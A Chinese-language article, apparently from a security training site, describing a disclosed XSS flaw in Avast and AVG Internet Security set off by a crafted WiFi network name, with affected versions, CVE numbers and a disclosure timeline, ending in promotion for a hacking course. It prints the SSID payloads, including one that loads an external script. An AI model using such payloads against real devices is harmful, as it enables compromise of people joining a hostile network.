Avast是由捷克的一家安全公司開發的防毒軟體，由電腦版和手機版，能執行在各類作業系統和手機系統上。

近日，國外一名安全研究員發現了Avast的一個漏洞，因此獲得了5000美元的獎勵。我們整理了一份圖文資料，給大家去還原一下這個漏洞的利用過程。

漏洞利用過程還原

首先通過簡單的XSS Payload構造一個SSID的名字，什麼是SSID呢？SSID其實就是我們每天都在使用的無線局WiFi的名字。

只需要使用簡單的><img src=x onerror=prompt(1)>作為SSID即可。由於SSID長度的限制，如果想引用外部指令碼，可以使用><embed src=//tiny.cc/XYZABCX>。

然後在已安裝好Avast防毒軟體的電腦上連線無線WIFI，選擇由XSS構成的SSID，等待payload生效。受害者只要連線上攻擊者的無線網路，幾秒內就會中招。

受影響的版本

Avast Internet Security的19.3.2369版本和AVG Internet Security的19.3.3084版本均受到影響。

時間線

2019年3月21日：發現了漏洞

2019年3月22日：向bugs@avast.com報告了漏洞

2019年3月25日：Avast確認漏洞的存在

2019年5月24日：Avast詢問此漏洞是否已解決（在Avast 19.4中）。

2019年6月12日：Avast認為此漏洞相當嚴重，因此決定獎勵5000美元。

2019年10月30日：Avast上的注入被標記為CVE-2019–18653，AVG上的注入被標記為CVE-2019–18654。

雖然這個漏洞是在安全研究人員在膝上型電腦上發現的，但安卓手機或蘋果手機版本也可能存在類似問題。

大家平時在連線WIFI的時候也要注意，類似上面提到的SSID，就不要亂連線了。

本文收錄在白帽黑客訓練營。現在加入我們白帽黑客訓練營的圈子，即可獲得大量有價值的學習資料。

資料每週都在更新，我們建立了資料庫，在圈子公告中，即可看到圈子資料庫。

目前資料如下：

1.網路安全：手機遠端控制教程，電腦遠端控制教程，Windows系統漏洞利用，安卓APP逆向工程，使用 Ettercap 進行網路嗅探，用Kali Linux蜜罐引誘黑客進入陷阱，網站滲透測試實戰教程，Wireshark抓取Android手機APP資料包，網站漏洞掃描，網站資料庫安全，zANTI手機滲透測試教程，網路掃描神器Nmap使用教程，等等。

2.C語言教程：10本C語言經典書籍，150套C語言真題，C語言常見問題集錦，等等。

3.從零開始學PHP教程，PHP是網站開發中最長使用到的程式語言，從事web網路安全研究，PHP是繞不開的話題。

4.網站前端教程：1.3G各類工具書和應用案例集錦，學會你就是一名合格的前端工程師。

5.組合語言和編譯原理，喜歡研究反編譯的朋友不要錯過。

6.CNAA網路工程師教程，密碼學，網站資料庫原理及應用，資訊保安。

7.考慮到部分朋友，基礎薄弱，我們還準備了大量的基礎教程：系統安裝，電腦網路設定，系統日常維護，電腦病毒和木馬查殺，系統安全設定和優化，電腦綜合應用。